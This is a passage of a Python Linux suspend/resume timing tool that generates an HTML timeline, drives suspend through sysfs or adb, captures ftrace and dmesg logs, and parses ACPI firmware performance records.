devtl.html['timeline'] += html_zoombox
devtl.html['timeline'] += html_timeline.format('dmesg', devtl.height)
# draw the colored boxes for each of the phases
for data in testruns:
for b in data.dmesg:
phase = data.dmesg[b]
length = phase['end']-phase['start']
left = '%.3f' % (((phase['start']-t0)*100.0)/tTotal)
width = '%.3f' % ((length*100.0)/tTotal)
devtl.html['timeline'] += html_phase.format(left, width, \
'%.3f'%devtl.scaleH, '%.3f'%(100-devtl.scaleH), \
data.dmesg[b]['color'], '')
# draw the time scale, try to make the number of labels readable
devtl.html['scale'] = createTimeScale(t0, tMax, tSuspended)
devtl.html['timeline'] += devtl.html['scale']
for data in testruns:
for b in data.dmesg:
phaselist = data.dmesg[b]['list']
for d in phaselist:
name = d
drv = ''
dev = phaselist[d]
if(d in sysvals.altdevname):
name = sysvals.altdevname[d]
if('drv' in dev and dev['drv']):
drv = ' {%s}' % dev['drv']
height = (100.0 - devtl.scaleH)/data.dmesg[b]['row']
top = '%.3f' % ((dev['row']*height) + devtl.scaleH)
left = '%.3f' % (((dev['start']-t0)*100)/tTotal)
width = '%.3f' % (((dev['end']-dev['start'])*100)/tTotal)
length = ' (%0.3f ms) ' % ((dev['end']-dev['start'])*1000)
color = 'rgba(204,204,204,0.5)'
devtl.html['timeline'] += html_device.format(dev['id'], \
d+drv+length+b, left, top, '%.3f'%height, width, name+drv)
# draw any trace events found
for data in testruns:
for b in data.dmesg:
phaselist = data.dmesg[b]['list']
for name in phaselist:
dev = phaselist[name]
if('traceevents' in dev):
vprint('Debug trace events found for device %s' % name)
vprint('%20s %20s %10s %8s' % ('action', \
'name', 'time(ms)', 'length(ms)'))
for e in dev['traceevents']:
vprint('%20s %20s %10.3f %8.3f' % (e.action, \
e.name, e.time*1000, e.length*1000))
height = (100.0 - devtl.scaleH)/data.dmesg[b]['row']
top = '%.3f' % ((dev['row']*height) + devtl.scaleH)
left = '%.3f' % (((e.time-t0)*100)/tTotal)
width = '%.3f' % (e.length*100/tTotal)
color = 'rgba(204,204,204,0.5)'
devtl.html['timeline'] += \
html_traceevent.format(e.action+' '+e.name, \
left, top, '%.3f'%height, \
width, e.color, '')
# timeline is finished
devtl.html['timeline'] += '</div>\n</div>\n'
# draw a legend which describes the phases by color
data = testruns[-1]
devtl.html['legend'] = '<div class="legend">\n'
pdelta = 100.0/len(data.phases)
pmargin = pdelta / 4.0
for phase in data.phases:
order = '%.2f' % ((data.dmesg[phase]['order'] * pdelta) + pmargin)
name = string.replace(phase, '_', ' ')
devtl.html['legend'] += html_legend.format(order, \
data.dmesg[phase]['color'], name)
devtl.html['legend'] += '</div>\n'
hf = open(sysvals.htmlfile, 'w')
thread_height = 0
# write the html header first (html head, css code, up to body start)
html_header = '<!DOCTYPE html>\n<html>\n<head>\n\
<meta http-equiv="content-type" content="text/html; charset=UTF-8">\n\
<title>AnalyzeSuspend</title>\n\
<style type=\'text/css\'>\n\
body {overflow-y: scroll;}\n\
.stamp {width: 100%;text-align:center;background-color:gray;line-height:30px;color:white;font: 25px Arial;}\n\
.callgraph {margin-top: 30px;box-shadow: 5px 5px 20px black;}\n\
.callgraph article * {padding-left: 28px;}\n\
h1 {color:black;font: bold 30px Times;}\n\
t0 {color:black;font: bold 30px Times;}\n\
t1 {color:black;font: 30px Times;}\n\
t2 {color:black;font: 25px Times;}\n\
t3 {color:black;font: 20px Times;white-space:nowrap;}\n\
t4 {color:black;font: bold 30px Times;line-height:60px;white-space:nowrap;}\n\
table {width:100%;}\n\
.gray {background-color:rgba(80,80,80,0.1);}\n\
.green {background-color:rgba(204,255,204,0.4);}\n\
.purple {background-color:rgba(128,0,128,0.2);}\n\
.yellow {background-color:rgba(255,255,204,0.4);}\n\
.time1 {font: 22px Arial;border:1px solid;}\n\
.time2 {font: 15px Arial;border-bottom:1px solid;border-left:1px solid;border-right:1px solid;}\n\
td {text-align: center;}\n\
r {color:#500000;font:15px Tahoma;}\n\
n {color:#505050;font:15px Tahoma;}\n\
.tdhl {color: red;}\n\
.hide {display: none;}\n\
.pf {display: none;}\n\
.pf:checked + label {background: url(\'data:image/svg+xml;utf,<?xml version="1.0" standalone="no"?><svg xmlns="http://www.w3.org/2000/svg" height="18" width="18" version="1.1"><circle cx="9" cy="9" r="8" stroke="black" stroke-width="1" fill="white"/><rect x="4" y="8" width="10" height="2" style="fill:black;stroke-width:0"/><rect x="8" y="4" width="2" height="10" style="fill:black;stroke-width:0"/></svg>\') no-repeat left center;}\n\
.pf:not(:checked) ~ label {background: url(\'data:image/svg+xml;utf,<?xml version="1.0" standalone="no"?><svg xmlns="http://www.w3.org/2000/svg" height="18" width="18" version="1.1"><circle cx="9" cy="9" r="8" stroke="black" stroke-width="1" fill="white"/><rect x="4" y="8" width="10" height="2" style="fill:black;stroke-width:0"/></svg>\') no-repeat left center;}\n\
.pf:checked ~ *:not(:nth-child(2)) {display: none;}\n\
.zoombox {position: relative; width: 100%; overflow-x: scroll;}\n\
.timeline {position: relative; font-size: 14px;cursor: pointer;width: 100%; overflow: hidden; background-color:#dddddd;}\n\
.thread {position: absolute; height: '+'%.3f'%thread_height+'%; overflow: hidden; line-height: 30px; border:1px solid;text-align:center;white-space:nowrap;background-color:rgba(204,204,204,0.5);}\n\
.thread:hover {background-color:white;border:1px solid red;z-index:10;}\n\
.hover {background-color:white;border:1px solid red;z-index:10;}\n\
.traceevent {position: absolute;opacity: 0.3;height: '+'%.3f'%thread_height+'%;width:0;overflow:hidden;line-height:30px;text-align:center;white-space:nowrap;}\n\
.phase {position: absolute;overflow: hidden;border:0px;text-align:center;}\n\
.phaselet {position:absolute;overflow:hidden;border:0px;text-align:center;height:100px;font-size:24px;}\n\
.t {position:absolute;top:0%;height:100%;border-right:1px solid black;}\n\
.legend {position: relative; width: 100%; height: 40px; text-align: center;margin-bottom:20px}\n\
.legend .square {position:absolute;top:10px; width: 0px;height: 20px;border:1px solid;padding-left:20px;}\n\
button {height:40px;width:200px;margin-bottom:20px;margin-top:20px;font-size:24px;}\n\
.devlist {position:'+x2changes[1]+';width:190px;}\n\
#devicedetail {height:100px;box-shadow: 5px 5px 20px black;}\n\
</style>\n</head>\n<body>\n'
hf.write(html_header)
# write the test title and general info header
if(sysvals.stamp['time'] != ""):
hf.write(headline_stamp.format(sysvals.stamp['host'],
sysvals.stamp['kernel'], sysvals.stamp['mode'], \
sysvals.stamp['time']))
# write the device timeline
hf.write(devtl.html['timeline'])
hf.write(devtl.html['legend'])
hf.write('<div id="devicedetailtitle"></div>\n')
hf.write('<div id="devicedetail" style="display:none;">\n')
# draw the colored boxes for the device detail section
for data in testruns:
hf.write('<div id="devicedetail%d">\n' % data.testnumber)
for b in data.phases:
phase = data.dmesg[b]
length = phase['end']-phase['start']
left = '%.3f' % (((phase['start']-t0)*100.0)/tTotal)
width = '%.3f' % ((length*100.0)/tTotal)
hf.write(html_phaselet.format(b, left, width, \
data.dmesg[b]['color']))
hf.write('</div>\n')
hf.write('</div>\n')
# write the ftrace data (callgraph)
data = testruns[-1]
if(sysvals.usecallgraph):
hf.write('<section id="callgraphs" class="callgraph">\n')
# write out the ftrace data converted to html
html_func_top = '<article id="{0}" class="atop" style="background-color:{1}">\n<input type="checkbox" class="pf" id="f{2}" checked/><label for="f{2}">{3} {4}</label>\n'
html_func_start = '<article>\n<input type="checkbox" class="pf" id="f{0}" checked/><label for="f{0}">{1} {2}</label>\n'
html_func_end = '</article>\n'
html_func_leaf = '<article>{0} {1}</article>\n'
num = 0
for p in data.phases:
list = data.dmesg[p]['list']
for devname in data.sortedDevices(p):
if('ftrace' not in list[devname]):
continue
name = devname
if(devname in sysvals.altdevname):
name = sysvals.altdevname[devname]
devid = list[devname]['id']
cg = list[devname]['ftrace']
flen = '<r>(%.3f ms @ %.3f to %.3f)</r>' % \
((cg.end - cg.start)*1000, cg.start*1000, cg.end*1000)
hf.write(html_func_top.format(devid, data.dmesg[p]['color'], \
num, name+' '+p, flen))
num += 1
for line in cg.list:
if(line.length < 0.000000001):
flen = ''
else:
flen = '<n>(%.3f ms @ %.3f)</n>' % (line.length*1000, \
line.time*1000)
if(line.freturn and line.fcall):
hf.write(html_func_leaf.format(line.name, flen))
elif(line.freturn):
hf.write(html_func_end)
else:
hf.write(html_func_start.format(num, line.name, flen))
num += 1
hf.write(html_func_end)
hf.write('\n\n </section>\n')
# write the footer and close
addScriptCode(hf, testruns)
hf.write('</body>\n</html>\n')
hf.close()
return True
# Function: addScriptCode
# Description:
# Adds the javascript code to the output html
# Arguments:
# hf: the open html file pointer
# testruns: array of Data objects from parseKernelLog or parseTraceLog
def addScriptCode(hf, testruns):
t0 = (testruns[0].start - testruns[-1].tSuspended) * 1000
tMax = (testruns[-1].end - testruns[-1].tSuspended) * 1000
# create an array in javascript memory with the device details
detail = ' var devtable = [];\n'
for data in testruns:
topo = data.deviceTopology()
detail += ' devtable[%d] = "%s";\n' % (data.testnumber, topo)
detail += ' var bounds = [%f,%f];\n' % (t0, tMax)
# add the code which will manipulate the data in the browser
script_code = \
'<script type="text/javascript">\n'+detail+\
' function zoomTimeline() {\n'\
' var timescale = document.getElementById("timescale");\n'\
' var dmesg = document.getElementById("dmesg");\n'\
' var zoombox = document.getElementById("dmesgzoombox");\n'\
' var val = parseFloat(dmesg.style.width);\n'\
' var newval = 100;\n'\
' var sh = window.outerWidth / 2;\n'\
' if(this.id == "zoomin") {\n'\
' newval = val * 1.2;\n'\
' if(newval > 40000) newval = 40000;\n'\
' dmesg.style.width = newval+"%";\n'\
' zoombox.scrollLeft = ((zoombox.scrollLeft + sh) * newval / val) - sh;\n'\
' } else if (this.id == "zoomout") {\n'\
' newval = val / 1.2;\n'\
' if(newval < 100) newval = 100;\n'\
' dmesg.style.width = newval+"%";\n'\
' zoombox.scrollLeft = ((zoombox.scrollLeft + sh) * newval / val) - sh;\n'\
' } else {\n'\
' zoombox.scrollLeft = 0;\n'\
' dmesg.style.width = "100%";\n'\
' }\n'\
' var html = "";\n'\
' var t0 = bounds[0];\n'\
' var tMax = bounds[1];\n'\
' var tTotal = tMax - t0;\n'\
' var wTotal = tTotal * 100.0 / newval;\n'\
' for(var tS = 1000; (wTotal / tS) < 3; tS /= 10);\n'\
' if(tS < 1) tS = 1;\n'\
' for(var s = ((t0 / tS)|0) * tS; s < tMax; s += tS) {\n'\
' var pos = (tMax - s) * 100.0 / tTotal;\n'\
' var name = (s == 0)?"S/R":(s+"ms");\n'\
' html += "<div class=\\"t\\" style=\\"right:"+pos+"%\\">"+name+"</div>";\n'\
' }\n'\
' timescale.innerHTML = html;\n'\
' }\n'\
' function deviceHover() {\n'\
' var name = this.title.slice(0, this.title.indexOf(" ("));\n'\
' var dmesg = document.getElementById("dmesg");\n'\
' var dev = dmesg.getElementsByClassName("thread");\n'\
' var cpu = -1;\n'\
' if(name.match("CPU_ON\[[0-9]*\]"))\n'\
' cpu = parseInt(name.slice(7));\n'\
' else if(name.match("CPU_OFF\[[0-9]*\]"))\n'\
' cpu = parseInt(name.slice(8));\n'\
' for (var i = 0; i < dev.length; i++) {\n'\
' dname = dev[i].title.slice(0, dev[i].title.indexOf(" ("));\n'\
' if((cpu >= 0 && dname.match("CPU_O[NF]*\\\[*"+cpu+"\\\]")) ||\n'\
' (name == dname))\n'\
' {\n'\
' dev[i].className = "thread hover";\n'\
' } else {\n'\
' dev[i].className = "thread";\n'\
' }\n'\
' }\n'\
' }\n'\
' function deviceUnhover() {\n'\
' var dmesg = document.getElementById("dmesg");\n'\
' var dev = dmesg.getElementsByClassName("thread");\n'\
' for (var i = 0; i < dev.length; i++) {\n'\
' dev[i].className = "thread";\n'\
' }\n'\
' }\n'\
' function deviceTitle(title, total, cpu) {\n'\
' var prefix = "Total";\n'\
' if(total.length > 3) {\n'\
' prefix = "Average";\n'\
' total[1] = (total[1]+total[3])/2;\n'\
' total[2] = (total[2]+total[4])/2;\n'\
' }\n'\
' var devtitle = document.getElementById("devicedetailtitle");\n'\
' var name = title.slice(0, title.indexOf(" "));\n'\
' if(cpu >= 0) name = "CPU"+cpu;\n'\
' var driver = "";\n'\
' var tS = "<t2>(</t2>";\n'\
' var tR = "<t2>)</t2>";\n'\
' if(total[1] > 0)\n'\
' tS = "<t2>("+prefix+" Suspend:</t2><t0> "+total[1].toFixed(3)+" ms</t0> ";\n'\
' if(total[2] > 0)\n'\
' tR = " <t2>"+prefix+" Resume:</t2><t0> "+total[2].toFixed(3)+" ms<t2>)</t2></t0>";\n'\
' var s = title.indexOf("{");\n'\
' var e = title.indexOf("}");\n'\
' if((s >= 0) && (e >= 0))\n'\
' driver = title.slice(s+1, e) + " <t1>@</t1> ";\n'\
' if(total[1] > 0 && total[2] > 0)\n'\
' devtitle.innerHTML = "<t0>"+driver+name+"</t0> "+tS+tR;\n'\
' else\n'\
' devtitle.innerHTML = "<t0>"+title+"</t0>";\n'\
' return name;\n'\
' }\n'\
' function deviceDetail() {\n'\
' var devinfo = document.getElementById("devicedetail");\n'\
' devinfo.style.display = "block";\n'\
' var name = this.title.slice(0, this.title.indexOf(" ("));\n'\
' var cpu = -1;\n'\
' if(name.match("CPU_ON\[[0-9]*\]"))\n'\
' cpu = parseInt(name.slice(7));\n'\
' else if(name.match("CPU_OFF\[[0-9]*\]"))\n'\
' cpu = parseInt(name.slice(8));\n'\
' var dmesg = document.getElementById("dmesg");\n'\
' var dev = dmesg.getElementsByClassName("thread");\n'\
' var idlist = [];\n'\
' var pdata = [[]];\n'\
' var pd = pdata[0];\n'\
' var total = [0.0, 0.0, 0.0];\n'\
' for (var i = 0; i < dev.length; i++) {\n'\
' dname = dev[i].title.slice(0, dev[i].title.indexOf(" ("));\n'\
' if((cpu >= 0 && dname.match("CPU_O[NF]*\\\[*"+cpu+"\\\]")) ||\n'\
' (name == dname))\n'\
' {\n'\
' idlist[idlist.length] = dev[i].id;\n'\
' var tidx = 1;\n'\
' if(dev[i].id[0] == "a") {\n'\
' pd = pdata[0];\n'\
' } else {\n'\
' if(pdata.length == 1) pdata[1] = [];\n'\
' if(total.length == 3) total[3]=total[4]=0.0;\n'\
' pd = pdata[1];\n'\
' tidx = 3;\n'\
' }\n'\
' var info = dev[i].title.split(" ");\n'\
' var pname = info[info.length-1];\n'\
' pd[pname] = parseFloat(info[info.length-3].slice(1));\n'\
' total[0] += pd[pname];\n'\
' if(pname.indexOf("suspend") >= 0)\n'\
' total[tidx] += pd[pname];\n'\
' else\n'\
' total[tidx+1] += pd[pname];\n'\
' }\n'\
' }\n'\
' var devname = deviceTitle(this.title, total, cpu);\n'\
' var left = 0.0;\n'\
' for (var t = 0; t < pdata.length; t++) {\n'\
' pd = pdata[t];\n'\
' devinfo = document.getElementById("devicedetail"+t);\n'\
' var phases = devinfo.getElementsByClassName("phaselet");\n'\
' for (var i = 0; i < phases.length; i++) {\n'\
' if(phases[i].id in pd) {\n'\
' var w = 100.0*pd[phases[i].id]/total[0];\n'\
' var fs = 32;\n'\
' if(w < 8) fs = 4*w | 0;\n'\
' var fs2 = fs*3/4;\n'\
' phases[i].style.width = w+"%";\n'\
' phases[i].style.left = left+"%";\n'\
' phases[i].title = phases[i].id+" "+pd[phases[i].id]+" ms";\n'\
' left += w;\n'\
' var time = "<t4 style=\\"font-size:"+fs+"px\\">"+pd[phases[i].id]+" ms<br></t4>";\n'\
' var pname = "<t3 style=\\"font-size:"+fs2+"px\\">"+phases[i].id.replace("_", " ")+"</t3>";\n'\
' phases[i].innerHTML = time+pname;\n'\
' } else {\n'\
' phases[i].style.width = "0%";\n'\
' phases[i].style.left = left+"%";\n'\
' }\n'\
' }\n'\
' }\n'\
' var cglist = document.getElementById("callgraphs");\n'\
' if(!cglist) return;\n'\
' var cg = cglist.getElementsByClassName("atop");\n'\
' for (var i = 0; i < cg.length; i++) {\n'\
' if(idlist.indexOf(cg[i].id) >= 0) {\n'\
' cg[i].style.display = "block";\n'\
' } else {\n'\
' cg[i].style.display = "none";\n'\
' }\n'\
' }\n'\
' }\n'\
' function devListWindow(e) {\n'\
' var sx = e.clientX;\n'\
' if(sx > window.innerWidth - 440)\n'\
' sx = window.innerWidth - 440;\n'\
' var cfg="top="+e.screenY+", left="+sx+", width=440, height=720, scrollbars=yes";\n'\
' var win = window.open("", "_blank", cfg);\n'\
' if(window.chrome) win.moveBy(sx, 0);\n'\
' var html = "<title>"+e.target.innerHTML+"</title>"+\n'\
' "<style type=\\"text/css\\">"+\n'\
' " ul {list-style-type:circle;padding-left:10px;margin-left:10px;}"+\n'\
' "</style>"\n'\
' var dt = devtable[0];\n'\
' if(e.target.id != "devlist1")\n'\
' dt = devtable[1];\n'\
' win.document.write(html+dt);\n'\
' }\n'\
' window.addEventListener("load", function () {\n'\
' var dmesg = document.getElementById("dmesg");\n'\
' dmesg.style.width = "100%"\n'\
' document.getElementById("zoomin").onclick = zoomTimeline;\n'\
' document.getElementById("zoomout").onclick = zoomTimeline;\n'\
' document.getElementById("zoomdef").onclick = zoomTimeline;\n'\
' var devlist = document.getElementsByClassName("devlist");\n'\
' for (var i = 0; i < devlist.length; i++)\n'\
' devlist[i].onclick = devListWindow;\n'\
' var dev = dmesg.getElementsByClassName("thread");\n'\
' for (var i = 0; i < dev.length; i++) {\n'\
' dev[i].onclick = deviceDetail;\n'\
' dev[i].onmouseover = deviceHover;\n'\
' dev[i].onmouseout = deviceUnhover;\n'\
' }\n'\
' zoomTimeline();\n'\
' });\n'\
'</script>\n'
hf.write(script_code);
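# Note (added for illustration, not part of the original script): the zoom
# handler above scales the timeline width between 100% and 40000% in 1.2x
# steps, and the tick-spacing loop picks the largest step (starting at
# 1000 ms and dividing by 10) that still yields at least 3 tick marks. For
# example, with a visible width (wTotal) of 250 ms the loop stops at
# tS = 10, so a tick is drawn every 10 ms.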
# Function: executeSuspend
# Description:
# Execute system suspend through the sysfs interface, then copy the output
# dmesg and ftrace files to the test output directory.
def executeSuspend():
global sysvals
detectUSB(False)
t0 = time.time()*1000
tp = sysvals.tpath
# execute however many s/r runs requested
for count in range(1,sysvals.execcount+1):
# clear the kernel ring buffer just as we start
os.system('dmesg -C')
# enable callgraph ftrace only for the second run
if(sysvals.usecallgraph and count == 2):
# set trace type
os.system('echo function_graph > '+tp+'current_tracer')
os.system('echo "" > '+tp+'set_ftrace_filter')
# set trace format options
os.system('echo funcgraph-abstime > '+tp+'trace_options')
os.system('echo funcgraph-proc > '+tp+'trace_options')
# focus only on device suspend and resume
os.system('cat '+tp+'available_filter_functions | '+\
'grep dpm_run_callback > '+tp+'set_graph_function')
# if this is test2 and there's a delay, start here
if(count > 1 and sysvals.x2delay > 0):
tN = time.time()*1000
while (tN - t0) < sysvals.x2delay:
tN = time.time()*1000
time.sleep(0.001)
# start ftrace
if(sysvals.usecallgraph or sysvals.usetraceevents):
print('START TRACING')
os.system('echo 1 > '+tp+'tracing_on')
# initiate suspend
if(sysvals.usecallgraph or sysvals.usetraceevents):
os.system('echo SUSPEND START > '+tp+'trace_marker')
if(sysvals.rtcwake):
print('SUSPEND START')
print('will autoresume in %d seconds' % sysvals.rtcwaketime)
sysvals.rtcWakeAlarm()
else:
print('SUSPEND START (press a key to resume)')
pf = open(sysvals.powerfile, 'w')
pf.write(sysvals.suspendmode)
# execution will pause here
pf.close()
t0 = time.time()*1000
# return from suspend
print('RESUME COMPLETE')
if(sysvals.usecallgraph or sysvals.usetraceevents):
os.system('echo RESUME COMPLETE > '+tp+'trace_marker')
# see if there's firmware timing data to be had
t = sysvals.postresumetime
if(t > 0):
print('Waiting %d seconds for POST-RESUME trace events...' % t)
time.sleep(t)
# stop ftrace
if(sysvals.usecallgraph or sysvals.usetraceevents):
os.system('echo 0 > '+tp+'tracing_on')
print('CAPTURING TRACE')
writeDatafileHeader(sysvals.ftracefile)
os.system('cat '+tp+'trace >> '+sysvals.ftracefile)
os.system('echo "" > '+tp+'trace')
# grab a copy of the dmesg output
print('CAPTURING DMESG')
writeDatafileHeader(sysvals.dmesgfile)
os.system('dmesg -c >> '+sysvals.dmesgfile)
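# Note (illustrative, not part of the original script): with callgraph mode
# enabled, the ftrace setup above is roughly equivalent to running by hand,
# where <tp> is sysvals.tpath (typically /sys/kernel/debug/tracing/):
#   echo function_graph > <tp>current_tracer
#   echo funcgraph-abstime > <tp>trace_options
#   echo funcgraph-proc > <tp>trace_options
#   grep dpm_run_callback <tp>available_filter_functions > <tp>set_graph_function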
def writeDatafileHeader(filename):
global sysvals
fw = getFPDT(False)
prt = sysvals.postresumetime
fp = open(filename, 'a')
fp.write(sysvals.teststamp+'\n')
if(fw):
fp.write('# fwsuspend %u fwresume %u\n' % (fw[0], fw[1]))
if(prt > 0):
fp.write('# post resume time %u\n' % prt)
fp.close()
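# The header prepended by writeDatafileHeader() looks roughly like this
# (the numbers below are purely illustrative):
#   <teststamp line>
#   # fwsuspend 184903 fwresume 338597
#   # post resume time 10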
# Function: executeAndroidSuspend
# Description:
# Execute system suspend through the sysfs interface
# on a remote android device, then transfer the output
# dmesg and ftrace files to the local output directory.
def executeAndroidSuspend():
global sysvals
# check to see if the display is currently off
tp = sysvals.tpath
out = os.popen(sysvals.adb+\
' shell dumpsys power | grep mScreenOn').read().strip()
# if so we need to turn it on so we can issue a new suspend
if(out.endswith('false')):
print('Waking the device up for the test...')
# send the KEYPAD_POWER keyevent to wake it up
os.system(sysvals.adb+' shell input keyevent 26')
# wait a few seconds so the user can see the device wake up
time.sleep(3)
# execute however many s/r runs requested
for count in range(1,sysvals.execcount+1):
# clear the kernel ring buffer just as we start
os.system(sysvals.adb+' shell dmesg -c > /dev/null 2>&1')
# start ftrace
if(sysvals.usetraceevents):
print('START TRACING')
os.system(sysvals.adb+" shell 'echo 1 > "+tp+"tracing_on'")
# initiate suspend
for count in range(1,sysvals.execcount+1):
if(sysvals.usetraceevents):
os.system(sysvals.adb+\
" shell 'echo SUSPEND START > "+tp+"trace_marker'")
print('SUSPEND START (press a key on the device to resume)')
os.system(sysvals.adb+" shell 'echo "+sysvals.suspendmode+\
" > "+sysvals.powerfile+"'")
# execution will pause here, then adb will exit
while(True):
check = os.popen(sysvals.adb+\
' shell pwd 2>/dev/null').read().strip()
if(len(check) > 0):
break
time.sleep(1)
if(sysvals.usetraceevents):
os.system(sysvals.adb+" shell 'echo RESUME COMPLETE > "+tp+\
"trace_marker'")
# return from suspend
print('RESUME COMPLETE')
# stop ftrace
if(sysvals.usetraceevents):
os.system(sysvals.adb+" shell 'echo 0 > "+tp+"tracing_on'")
print('CAPTURING TRACE')
os.system('echo "'+sysvals.teststamp+'" > '+sysvals.ftracefile)
os.system(sysvals.adb+' shell cat '+tp+\
'trace >> '+sysvals.ftracefile)
# grab a copy of the dmesg output
print('CAPTURING DMESG')
os.system('echo "'+sysvals.teststamp+'" > '+sysvals.dmesgfile)
os.system(sysvals.adb+' shell dmesg >> '+sysvals.dmesgfile)
# Function: setUSBDevicesAuto
# Description:
# Set the autosuspend control parameter of all USB devices to auto
# This can be dangerous, so use at your own risk; most devices are set
# to always-on since the kernel can't determine whether the device can
# properly autosuspend
def setUSBDevicesAuto():
global sysvals
rootCheck()
for dirname, dirnames, filenames in os.walk('/sys/devices'):
if(re.match('.*/usb[0-9]*.*', dirname) and
'idVendor' in filenames and 'idProduct' in filenames):
os.system('echo auto > %s/power/control' % dirname)
name = dirname.split('/')[-1]
desc = os.popen('cat %s/product 2>/dev/null' % \
dirname).read().replace('\n', '')
ctrl = os.popen('cat %s/power/control 2>/dev/null' % \
dirname).read().replace('\n', '')
print('control is %s for %6s: %s' % (ctrl, name, desc))
# Function: yesno
# Description:
# Print out an equivalent Y or N for a set of known parameter values
# Output:
# 'Y', 'N', or ' ' if the value is unknown
def yesno(val):
yesvals = ['auto', 'enabled', 'active', '1']
novals = ['on', 'disabled', 'suspended', 'forbidden', 'unsupported']
if val in yesvals:
return 'Y'
elif val in novals:
return 'N'
return ' '
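# Illustrative examples (added, not in the original):
#   yesno('auto')     -> 'Y'
#   yesno('disabled') -> 'N'
#   yesno('whatever') -> ' '   (unrecognized values map to a blank)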
# Function: ms2nice
# Description:
# Print out a very concise time string in minutes and seconds
# Output:
# The time string, e.g. "1901m16s"
def ms2nice(val):
ms = 0
try:
ms = int(val)
except:
return 0.0
m = ms / 60000
s = (ms / 1000) - (m * 60)
return '%3dm%2ds' % (m, s)
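# Illustrative example (added): ms2nice('114076000') -> '1901m16s',
# i.e. 114076000 ms is 1901 minutes and 16 seconds.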
# Function: detectUSB
# Description:
# Detect all the USB hosts and devices currently connected and add
# a list of USB device names to sysvals for better timeline readability
# Arguments:
# output: True to output the info to stdout, False otherwise
def detectUSB(output):
global sysvals
field = {'idVendor':'', 'idProduct':'', 'product':'', 'speed':''}
power = {'async':'', 'autosuspend':'', 'autosuspend_delay_ms':'',
'control':'', 'persist':'', 'runtime_enabled':'',
'runtime_status':'', 'runtime_usage':'',
'runtime_active_time':'',
'runtime_suspended_time':'',
'active_duration':'',
'connected_duration':''}
if(output):
print('LEGEND')
print('---------------------------------------------------------------------------------------------')
print(' A = async/sync PM queue Y/N D = autosuspend delay (seconds)')
print(' S = autosuspend Y/N rACTIVE = runtime active (min/sec)')
print(' P = persist across suspend Y/N rSUSPEN = runtime suspend (min/sec)')
print(' E = runtime suspend enabled/forbidden Y/N ACTIVE = active duration (min/sec)')
print(' R = runtime status active/suspended Y/N CONNECT = connected duration (min/sec)')
print(' U = runtime usage count')
print('---------------------------------------------------------------------------------------------')
print(' NAME ID DESCRIPTION SPEED A S P E R U D rACTIVE rSUSPEN ACTIVE CONNECT')
print('---------------------------------------------------------------------------------------------')
for dirname, dirnames, filenames in os.walk('/sys/devices'):
if(re.match('.*/usb[0-9]*.*', dirname) and
'idVendor' in filenames and 'idProduct' in filenames):
for i in field:
field[i] = os.popen('cat %s/%s 2>/dev/null' % \
(dirname, i)).read().replace('\n', '')
name = dirname.split('/')[-1]
if(len(field['product']) > 0):
sysvals.altdevname[name] = \
'%s [%s]' % (field['product'], name)
else:
sysvals.altdevname[name] = \
'%s:%s [%s]' % (field['idVendor'], \
field['idProduct'], name)
if(output):
for i in power:
power[i] = os.popen('cat %s/power/%s 2>/dev/null' % \
(dirname, i)).read().replace('\n', '')
if(re.match('usb[0-9]*', name)):
first = '%-8s' % name
else:
first = '%8s' % name
print('%s [%s:%s] %-20s %-4s %1s %1s %1s %1s %1s %1s %1s %s %s %s %s' % \
(first, field['idVendor'], field['idProduct'], \
field['product'][0:20], field['speed'], \
yesno(power['async']), \
yesno(power['control']), \
yesno(power['persist']), \
yesno(power['runtime_enabled']), \
yesno(power['runtime_status']), \
power['runtime_usage'], \
power['autosuspend'], \
ms2nice(power['runtime_active_time']), \
ms2nice(power['runtime_suspended_time']), \
ms2nice(power['active_duration']), \
ms2nice(power['connected_duration'])))
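# Illustrative example (added): for a device directory ending in "1-2" whose
# product file reads "USB Mouse", the loop above records
# sysvals.altdevname['1-2'] = 'USB Mouse [1-2]' for use in the timeline.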
# Function: getModes
# Description:
# Determine the supported power modes on this system
# Output:
# A string list of the available modes
def getModes():
global sysvals
modes = ''
if(not sysvals.android):
if(os.path.exists(sysvals.powerfile)):
fp = open(sysvals.powerfile, 'r')
modes = string.split(fp.read())
fp.close()
else:
line = os.popen(sysvals.adb+' shell cat '+\
sysvals.powerfile).read().strip()
modes = string.split(line)
return modes
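# Illustrative example (added): on a typical laptop the power file
# (normally /sys/power/state) contains "freeze mem disk", so getModes()
# returns ['freeze', 'mem', 'disk'].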
# Function: getFPDT
# Description:
# Read the acpi bios tables and pull out FPDT, the firmware data
# Arguments:
# output: True to output the info to stdout, False otherwise
def getFPDT(output):
global sysvals
rectype = {}
rectype[0] = 'Firmware Basic Boot Performance Record'
rectype[1] = 'S3 Performance Table Record'
prectype = {}
prectype[0] = 'Basic S3 Resume Performance Record'
prectype[1] = 'Basic S3 Suspend Performance Record'
rootCheck()
if(not os.path.exists(sysvals.fpdtpath)):
if(output):
doError('file doesnt exist: %s' % sysvals.fpdtpath, False)
return False
if(not os.access(sysvals.fpdtpath, os.R_OK)):
if(output):
doError('file isnt readable: %s' % sysvals.fpdtpath, False)
return False
if(not os.path.exists(sysvals.mempath)):
if(output):
doError('file doesnt exist: %s' % sysvals.mempath, False)
return False
if(not os.access(sysvals.mempath, os.R_OK)):
if(output):
doError('file isnt readable: %s' % sysvals.mempath, False)
return False
fp = open(sysvals.fpdtpath, 'rb')
buf = fp.read()
fp.close()
if(len(buf) < 36):
if(output):
doError('Invalid FPDT table data, should '+\
'be at least 36 bytes', False)
return False
table = struct.unpack('4sIBB6s8sI4sI', buf[0:36])
if(output):
print('')
print('Firmware Performance Data Table (%s)' % table[0])
print(' Signature : %s' % table[0])
print(' Table Length : %u' % table[1])
print(' Revision : %u' % table[2])
print(' Checksum : 0x%x' % table[3])
print(' OEM ID : %s' % table[4])
print(' OEM Table ID : %s' % table[5])
print(' OEM Revision : %u' % table[6])
print(' Creator ID : %s' % table[7])
print(' Creator Revision : 0x%x' % table[8])
print('')
if(table[0] != 'FPDT'):
if(output):
doError('Invalid FPDT table')
return False
if(len(buf) <= 36):
return False
i = 0
fwData = [0, 0]
records = buf[36:]
fp = open(sysvals.mempath, 'rb')
while(i < len(records)):
header = struct.unpack('HBB', records[i:i+4])
		if(header[1] == 0):
			break
		if(header[0] not in rectype):
			# unknown record type: advance past it so this loop terminates
			i += header[1]
			continue
		if(header[1] != 16):
			i += header[1]
			continue
addr = struct.unpack('Q', records[i+8:i+16])[0]
try:
fp.seek(addr)
first = fp.read(8)
except:
doError('Bad address 0x%x in %s' % (addr, sysvals.mempath), False)
rechead = struct.unpack('4sI', first)
recdata = fp.read(rechead[1]-8)
if(rechead[0] == 'FBPT'):
record = struct.unpack('HBBIQQQQQ', recdata)
if(output):
